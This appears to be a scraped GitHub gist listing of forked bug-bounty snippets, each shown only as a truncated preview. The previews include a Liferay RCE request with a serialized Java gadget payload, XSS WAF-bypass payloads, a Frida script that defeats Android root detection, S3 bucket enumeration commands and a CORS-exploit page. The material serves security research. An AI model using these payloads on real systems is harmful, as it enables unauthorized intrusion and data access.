This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
chouaib Hm chouaibhm
chouaibhm
/ concurrency.go
Created
October 2, 2021 10:48
— forked from hahwul/concurrency.go
Go concurrency
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "strconv" | |
| "sync" | |
| ) | |
| func main() { | |
| fmt.Println("vim-go") |
chouaibhm
/ JavascriptRecon.md
Created
August 8, 2021 20:52
— forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty
chouaibhm
/ PoC_CVE-2021-28482.py
Created
May 5, 2021 19:53
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
chouaibhm
/ LiferayRce.txt
Created
May 3, 2021 05:50
— forked from Mad-robot/LiferayRce.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4910 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |
chouaibhm
/ Amass Config
Created
April 30, 2021 01:24
— forked from PatrikFehrenbach/Amass Config
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright 2017-2020 Jeff Foley. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| mode = active | |
| # The directory that stores the Cayley graph database and other output files | |
| # The default for Linux systems is: $HOME/.config/amass | |
| #output_directory = amass |
chouaibhm
/ CVE-2019-2725.md
Last active
November 11, 2020 10:07
— forked from pikpikcu/CVE-2019-2725.md
CVE-2019-2725 weblogic ver:10.3.6 RCE
chouaibhm
/ root_bypass.js
Created
September 27, 2020 16:53
— forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto ([email protected]): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
chouaibhm
/ mutation_a.txt
Created
June 18, 2020 16:33
— forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |
chouaibhm
/ gist:9b997f149d39cf480260b3ff62eddd0f
Created
February 3, 2020 13:31
— forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
Use wfuzz or ffuf to enumerate s3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Ffuf (faster): | |
| ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v | |
| Wfuzz: | |
| wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50 | |
| The files: |
chouaibhm
/ Firefox-CORS-Misconfig.js
Created
July 4, 2019 14:09
— forked from Voorivex/Firefox-CORS-Misconfig.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <meta content="text/html;charset=utf-8" http-equiv="Content-Type"> | |
| <meta content="utf-8" http-equiv="encoding"> | |
| <body onload="CreateListReaderIframe()"> | |
| <script> | |
| function CreateListReaderIframe() { | |
| var ifr = document.createElement("iframe"); |
NewerOlder